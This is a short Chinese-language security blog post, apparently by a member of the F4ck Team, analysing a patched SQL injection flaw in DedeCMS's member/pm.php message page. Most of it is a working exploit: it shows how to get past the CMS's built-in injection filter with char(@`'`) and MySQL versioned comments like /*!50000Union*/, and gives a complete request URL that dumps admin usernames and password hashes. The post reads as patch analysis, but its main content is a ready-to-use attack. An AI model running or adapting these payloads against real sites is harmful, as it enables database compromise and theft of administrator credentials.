Author:Sunshie
QQ:1141056911
Blog:http://phpinfo.me
F4ck Team & Ezenteam
#######################
http://www.wooyun.org/corps/Dedecms
乌云上已经刷爆啦 但是没公开细节
漏洞文件member/pm.php (官方已修补)
下载补丁下来看看member/pm.php文件到底修补了什么
对id加了个intval
关键在这里
先构造语句 DEDE不是有80sec防注入嘛 所以加个char(@`’`)
SELECT * FROM `#@__member_pms` WHERE id=’1′and char(@`’`) and 1=2 UniOn SelEct 1,2,3,4,5,6,7,8,9,10,11,12 #’ AND (fromid=’6′ OR toid=’6′)
然后提交
http://127.0.0.1/dede/member/pm. … =2+UniOn+SelEct%201,2,3,4,5,6,7,8,9,10,11,12%20%23
Safe Alert: Request Error step 1 !
滤union神马的 绕过无压力直接/*!50000Union*/ 就可以过了
然后提交
http://127.0.0.1/dede/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2+/*!50000Union*/ +/*!50000select*/ +1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%23@__admin`%23
成功注入
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论